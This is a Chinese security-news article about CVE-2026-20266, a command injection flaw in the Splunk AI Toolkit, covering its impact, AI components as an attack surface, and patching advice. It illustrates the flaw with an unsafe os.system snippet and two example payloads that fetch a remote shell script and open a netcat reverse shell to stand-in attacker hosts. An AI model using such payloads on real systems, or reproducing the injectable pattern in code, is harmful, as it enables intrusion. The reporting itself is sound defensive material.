惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

cs.CV updates on arXiv.org
cs.CV updates on arXiv.org
小众软件
小众软件
博客园_首页
博客园 - 聂微东
V
V2EX
WordPress大学
WordPress大学
freeCodeCamp Programming Tutorials: Python, JavaScript, Git & More
OSCHINA 社区最新新闻
OSCHINA 社区最新新闻
罗磊的独立博客
酷 壳 – CoolShell
酷 壳 – CoolShell
博客园 - 司徒正美
博客园 - 三生石上(FineUI控件)
奇客Solidot–传递最新科技情报
奇客Solidot–传递最新科技情报
S
SegmentFault 最新的问题
J
Java Code Geeks
Last Week in AI
Last Week in AI
The Cloudflare Blog
月光博客
月光博客
雷峰网
雷峰网
宝玉的分享
宝玉的分享
钛媒体:引领未来商业与生活新知
钛媒体:引领未来商业与生活新知
Hugging Face - Blog
Hugging Face - Blog
让小产品的独立变现更简单 - ezindie.com
让小产品的独立变现更简单 - ezindie.com
有赞技术团队
有赞技术团队
人人都是产品经理
人人都是产品经理
博客园 - Franky
腾讯CDC
Jina AI
Jina AI
博客园 - 叶小钗
大猫的无限游戏
大猫的无限游戏
阮一峰的网络日志
阮一峰的网络日志
量子位
爱范儿
爱范儿
美团技术团队
T
Tailwind CSS Blog
博客园 - 【当耐特】
D
Docker
IT之家
IT之家
V
Visual Studio Blog
P
Proofpoint News Feed
L
LangChain Blog
Engineering at Meta
Engineering at Meta
C
Check Point Blog
G
Google Developers Blog
Google DeepMind News
Google DeepMind News
云风的 BLOG
云风的 BLOG
Cyber Security Advisories - MS-ISAC
Cyber Security Advisories - MS-ISAC
Microsoft Azure Blog
Microsoft Azure Blog
B
Blog RSS Feed
Recorded Future
Recorded Future

安全客-有思想的安全新媒体

停产六周即破产:德国37年纺织老厂之死,揭示网络攻击最残酷的真相-安全KER - 安全资讯平台 Ghostcommit 攻击:恶意提示藏入图片,劫持Agent实施窃取-安全KER - 安全资讯平台 智能体面临的十大安全风险问题-安全KER - 安全资讯平台 紧急!医疗巨头美敦力遭黑客入侵,患者隐私数据大规模外泄,这些坑普通人千万别踩-安全KER - 安全资讯平台 伊朗黑客组织亮出"秘密武器":Cavern C2框架如何绕过所有安全检测-安全KER - 安全资讯平台 630GB机密挂上暗网:苹果二十年供应链铁幕一夜崩塌-安全KER - 安全资讯平台 【FDE前沿部署工程师】全国百城上岗计划二期来啦!-安全KER - 安全资讯平台 RedAmon:串联侦察、漏洞利用与后渗透的 AI 安全工具-安全KER - 安全资讯平台 SecSuite—— 搭载人工智能的开源情报、Web 与 API 安全综合测试工具-安全KER 恶意Skills利用扫描规避技术攻击Claude Code和Codex-安全KER - 安全资讯平台 T3MP3ST 安全框架:集成 35 款工具,将 AI 代码智能体转化为零日漏洞挖掘器-安全KER 首个AI全流程勒索攻击来了:JADEPUFFER证明,勒索不再需要人类操盘手-安全KER - 安全资讯平台 不给钱就社死,勒索软件又有新套路-安全KER - 安全资讯平台 一款完全离线的自主渗透测试智能体AIRecon-安全KER - 安全资讯平台 纳米Work Box全国渠道伙伴招募正式启动-安全KER - 安全资讯平台 新开源网络安全平台CyberSentinel AI v3.0 正式亮相-安全KER - 安全资讯平台 Weaxor勒索软件又添Linux平台变种-安全KER - 安全资讯平台 「文科生AI黑客松」专访:社会工作专业范心怡,和她那个会夸人的电子穿搭闺蜜-安全KER - 安全资讯平台 不写代码,照样赢!全国首届文科生AI黑客松圆满落幕-安全KER - 安全资讯平台 AI安全网关:企业统一接入、安全防护与数据安全的必要性与实践路径-安全KER - 安全资讯平台 借一个简单AI靶场初步了解提示词注入-安全KER - 安全资讯平台 瑞数信息入选IDC《中国智能体威胁检测技术评估,2026》-安全KER - 安全资讯平台 GitHub 被黑,3800个内部仓库外泄:从一枚恶意VS Code扩展说起-安全KER - 安全资讯平台 从开源投毒到AI生成代码:供应链安全为何成为企业安全的主战场?-安全KER - 安全资讯平台 灵境 AIDR 技术首发 | 以 AI 治理 AI,悬镜智能体安全卫士新品发布-安全KER 基于 Hypervisor 的 Denuvo DRM 绕过与 "社工闭环" 威胁模型研究-安全KER 国务院令第834号已落地:软件供应链安全,企业欠缺的不是工具,是这三件事-安全KER - 安全资讯平台 重大安全信号藏在这场国际会议的“行动指南”里-安全KER - 安全资讯平台 NGINX惊爆18年老洞,野外攻击已开始-安全KER - 安全资讯平台 科技云报到:AI Agent重塑客服战场,容联云用“1脑+多技能”重新定义客服Agent-安全KER - 安全资讯平台 科技云报到:“联通星罗”Token服务平台正式发布,为OPC创业提供“最佳助攻”-安全KER - 安全资讯平台 当攻击开始“自主决策”,安全体系如何应战?-安全KER - 安全资讯平台 科技云报到:智算千亿赛道向何方?一文读懂信通院《2026智能算力服务研究报告》-安全KER - 安全资讯平台 亿格云完成数亿元B轮融资,加码“人+AI”统一安全治理-安全KER - 安全资讯平台 安全进入“AI自主攻击”时代,瑞数信息如何用AI对抗AI-安全KER - 安全资讯平台 智能体关键年:Agent扎根业务流,AI生产力正在形成-安全KER - 安全资讯平台 深度分析Sorry勒索软件的加密实现与行为特征-安全KER - 安全资讯平台 科技云报到:当AI闯入特教行业,一场颠覆变革正在发生!-安全KER - 安全资讯平台 科技云报到:AI云,逻辑变了吗?-安全KER - 安全资讯平台 工程化实战思维在红队技战术中的应用-安全KER - 安全资讯平台 鸿蒙NEXT应用一键加固——AI Agent助力安全开发-安全KER - 安全资讯平台 科技云报到:AI算力革命,终结云计算20年降价史-安全KER - 安全资讯平台 科技云报到:“龙虾”入笼:为何金融行业不敢“养”?-安全KER - 安全资讯平台 科技云报到:“龙虾”OpenClaw狂欢之下,需要一针清醒剂-安全KER - 安全资讯平台 瑞数信息入选IDC两大AI安全报告,防御OpenClaw小龙虾裸奔危机-安全KER - 安全资讯平台 2026首届汽车安全白帽黑客大会圆满收官,共筑车联网安全新生态-安全KER - 安全资讯平台 Ally WordPress插件高危SQL注入漏洞 威胁40万个网站-安全KER - 安全资讯平台 OpenAI战略调整Sora视频AI将直接接入ChatGPT-安全KER - 安全资讯平台 HPE发布Aruba OS高危漏洞预警 可未授权重置密码-安全KER - 安全资讯平台 能感知自身正在被测试的AI Anthropic关于Claude自我意识的惊人发现-安全KER - 安全资讯平台 GitLab发布紧急安全更新 修复高危XSS与API拒绝服务漏洞-安全KER - 安全资讯平台 Telegram的黑色面 网络罪犯利用机器人API隐秘窃取数据-安全KER - 安全资讯平台 Armadin获1.9亿美元融资 用AI实现自动化红队攻防-安全KER - 安全资讯平台 Splunk修复文件预览功能中的高危RCE漏洞-安全KER - 安全资讯平台 虚假招聘陷阱 微软揭露针对开发者的传染性面试攻击活动-安全KER - 安全资讯平台 可变标签陷阱Xygeni GitHub Action高危漏洞危及CI/CD流水线-安全KER - 安全资讯平台 侧边栏里的间谍假冒AI浏览器插件窃取90万用户数据-安全KER - 安全资讯平台 Kubernetes安全预警Ingress-Nginx注入漏洞可致集群密钥全局泄露-安全KER - 安全资讯平台 Budibase存在高危漏洞 可导致生产环境密钥全面泄露-安全KER - 安全资讯平台
Splunk AI Toolkit曝高危漏洞:CVSS 9.1,可远程执行任意系统命令-安全KER - 安全资讯平台
安全客 · 2026-06-18 · via 安全客-有思想的安全新媒体
最近,AI安全领域再次响起警报。全球知名安全运营平台Splunk披露,其AI Toolkit组件存在一个严重安全漏洞,攻击者一旦成功利用,可直接在目标服务器上执行任意操作系统命令,甚至进一步控制整个安全运营环境。漏洞编号为CVE-2026-20266,CVSS评分高达9.1分,影响Splunk AI Toolkit 5.7.4之前的所有版本。

对于大量依赖Splunk开展日志分析、威胁检测和安全运营工作的企业而言,这并不是一个普通漏洞,而是一次对AI安全能力本身的警示。

一、一个AI组件,为何能拿到9.1高分?

根据Splunk发布的安全公告,该漏洞属于经典的CWE-78:OS Command Injection(操作系统命令注入)。

问题出现在AI Toolkit内部的一个名为btool configuration helper的辅助组件。

简单来说,这个组件负责处理配置相关操作,但开发过程中采用了不安全的Shell调用方式。

其核心逻辑类似:

command = f"some_tool {user_input}"os.system(command)

程序会动态拼接命令字符串,并交由Shell执行。

但开发者没有对输入参数进行严格过滤,也没有关闭Shell解释功能。

攻击者只需要构造特殊参数,例如:

curl attacker.com/shell.sh | bash或者:&& nc -e /bin/bash attacker_ip 4444

系统就可能在执行正常配置命令的同时,执行攻击者植入的恶意指令。

二、利用门槛不低,但后果极其严重

从CVSS向量来看:

AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

漏洞具备几个特点:

网络可达(AV:N)

攻击者无需本地接触设备。

利用复杂度低(AC:L)

无需复杂环境构造。

无需用户交互(UI:N)

管理员不需要点击链接或下载文件。

影响范围扩大(S:C)

可能突破Splunk应用边界,影响宿主系统。

当然,漏洞利用也有一个前提:

攻击者需要拥有Splunk管理员权限。

有些人看到这里可能会认为问题不大。

但在真实攻防场景中,这恰恰是最危险的一类漏洞。

因为Splunk管理员账户往往是攻击链中的重要目标。

攻击者完全可能通过以下方式获取权限:

  • 凭证泄露;
  • 弱密码攻击;
  • 钓鱼邮件窃取Cookie;
  • SSO配置缺陷;
  • 内部人员滥用;
  • 已存在的Splunk漏洞组合利用。

一旦获得管理员权限,CVE-2026-20266就成为攻击者横向移动和权限扩张的重要跳板。

三、为什么Splunk失守比普通服务器更危险?

与普通业务系统相比,Splunk承担的是企业安全运营中心(SOC)的核心职责。

它掌握着企业最敏感的数据资产,包括:

  • 网络流量日志;
  • 主机审计数据;
  • 安全告警信息;
  • 威胁情报数据;
  • 用户行为记录;
  • 云平台日志。

攻击者控制Splunk后,可能造成四类严重影响。

1.篡改安全告警

删除攻击痕迹。

关闭检测规则。

伪造正常日志。

使安全团队“失明”。

2.窃取敏感数据

Splunk中汇聚的大量日志,本身就是攻击者眼中的情报金矿。

例如:

VPN账户信息;

API密钥;

数据库连接信息;

内网资产清单;

安全设备配置。

3.破坏安全运营能力

停止Indexer。

关闭Search Head。

删除知识库。

导致SOC无法正常运行。

4.作为横向渗透跳板

许多企业Splunk部署在高权限区域。

甚至能够访问:

  • AD域控;
  • 云平台接口;
  • EDR管理端;
  • 漏洞扫描系统;
  • SOAR自动化平台。

攻击者一旦控制Splunk,就相当于拿到了整个安全体系的中枢控制台。

四、AI工具正在成为新的攻击面

值得关注的是,此次漏洞并不发生在Splunk核心引擎,而是出现在AI Toolkit中。

这意味着:

AI能力正在成为企业新的攻击入口。

近年来,越来越多安全厂商开始引入AI组件,例如:

  • LLM辅助分析;
  • 自动化告警研判;
  • Agent编排;
  • 智能查询助手;

安全Copilot。

这些AI能力通常需要调用外部工具、执行脚本、访问系统资源。

如果开发过程中缺乏安全设计,很容易出现:

Prompt注入

攻击模型执行非预期操作。

工具调用滥用

Agent被诱导调用高权限工具。

命令注入

动态拼接Shell命令。

依赖组件漏洞

第三方AI框架自身存在缺陷。

记忆投毒

长期污染模型上下文。

CVE-2026-20266再次提醒行业:

AI功能越强大,安全边界就越需要前置设计。

五、如何应对此次漏洞?

Splunk官方已经发布修复版本。

受影响版本

AI Toolkit 5.7.4以下版本。

安全版本

AI Toolkit 5.7.4及以上。

企业建议立即开展以下工作。

第一,全面排查资产

确认是否部署Splunk AI Toolkit。

统计具体版本。

第二,立即升级

优先升级至5.7.4以上版本。

避免继续暴露风险。

第三,限制管理员权限

严格控制Splunk管理员账号数量。

采用最小权限原则。

第四,加强行为监测

重点关注:

  • 异常Shell调用;
  • 可疑子进程创建;
  • 网络外联行为;
  • 非授权配置修改。

第五,评估AI组件风险

建议将AI插件、Agent工具链纳入漏洞管理体系。

建立独立的AI应用安全基线。

六、结语

CVE-2026-20266本质上并不是一个新型漏洞。

它依然属于安全行业最熟悉的命令注入问题。

但它发生在AI工具组件中,影响的是企业安全运营平台,这使得其风险等级被进一步放大。

过去,我们更多关注AI模型是否足够智能;如今,更需要关注的是:

AI是否足够安全。

对于安全行业而言,AI不是外挂,更不是万能药。只有将安全能力深度融入模型、工具和智能体的设计阶段,才能真正避免“用AI守护安全,却被AI拖垮安全”的尴尬局面。

信息来源:https://cybersecuritynews.com/splunk-ai-toolkit-vulnerability/